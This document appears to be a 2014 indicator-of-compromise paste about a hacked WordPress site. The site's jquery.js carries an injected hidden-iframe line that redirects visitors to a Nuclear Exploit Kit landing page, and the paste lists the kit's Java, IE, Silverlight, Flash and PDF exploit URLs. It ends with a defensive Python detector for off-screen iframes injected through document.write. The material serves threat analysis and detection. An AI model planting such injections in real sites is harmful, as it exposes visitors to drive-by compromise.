malwageddon

IOC - www.coffeeandquinoa.com - 2014-09-10

Sep 10th, 2014
// JavaScript at http://www.coffeeandquinoa.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 has the following code injected

document.write('<iframe src="http://fikakuir.zuttoakame.com/giglouiders16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe>');

// request for 'http://fikakuir.zuttoakame.com/giglouiders16.html' returns 302 response to 'http://digaoplar.nutrimedica.com.br/1550ce7dpwt/1/9ffbf35e4190fbba62f70c8477fa3964.html'

HTTP/1.1 302 Found
Server: nginx
Date: Wed, 10 Sep 2014 16:39:18 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 360
Location: http://digaoplar.nutrimedica.com.br/1550ce7dpwt/1/9ffbf35e4190fbba62f70c8477fa3964.html
Connection: close
Set-Cookie:

// 9ffbf35e4190fbba62f70c8477fa3964.html is a landing page for Nuclear Exploit Kit that will attempt to compromise the machine through the following

http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.jar - Java Exploit
http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.htm - IE Exploit
http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.xap - Silverlight Exploit
http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.swf - Shockwave Flash Player Exploit
http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.pdf - Adobe PDF plugin Exploit
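
A defender-side check for the injection pattern shown above, added here as an example and not part of the original paste: it scans the text of a served JavaScript file for document.write() calls that emit an iframe positioned off-screen. The function name, the 100px threshold and the sample input (placeholder hosts) are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# document.write('...') or document.write("...") with a single string literal argument.
DOC_WRITE = re.compile(r"""document\.write\(\s*(['"])(?P<body>.*?)\1\s*\)""", re.I | re.S)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# Negative top/left offsets in px; the lookbehind skips margin-top, padding-left, etc.
OFFSET = re.compile(r"(?<![-\w])(top|left)\s*:\s*-(\d+)\s*px", re.I)
POSITIONED = re.compile(r"\bposition\s*:\s*(?:absolute|fixed)\b", re.I)

def find_hidden_iframes(js_text, min_offset=100):
    """Return one finding per document.write()-injected iframe placed off-screen."""
    findings = []
    for call in DOC_WRITE.finditer(js_text):
        for tag in IFRAME.finditer(call.group("body")):
            raw = tag.group(0)
            # Match on the raw tag text: nested quotes (font-family: "Times New Roman")
            # cut the style attribute short for an HTML attribute parser.
            offsets = {prop.lower(): int(px) for prop, px in OFFSET.findall(raw)}
            if not POSITIONED.search(raw) or not any(v >= min_offset for v in offsets.values()):
                continue
            src = SRC.search(raw)
            url = src.group(1) if src else None
            findings.append({"src": url,
                             "host": urlsplit(url).hostname if url else None,
                             "offsets": offsets})
    return findings

# Constructed sample (placeholder hosts): one injected line, one ordinary embed.
SAMPLE_JS = r'''
/*! library code ... */
document.write('<iframe src="http://redirector.example/landing.html" width="201" height="201" style="top: -901px;position: absolute;font-family: "Times New Roman", Georgia, Serif;left: -901px;"></iframe>');
document.write("<iframe src='https://video.example/embed' width='560' height='315'></iframe>");
'''

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_JS):
        print(f"hidden iframe -> {f['host']} ({f['src']}) offsets={f['offsets']}")
```

Comparing the reported host against the site's own domain and its known third-party script hosts separates an injected redirector from a legitimate embed.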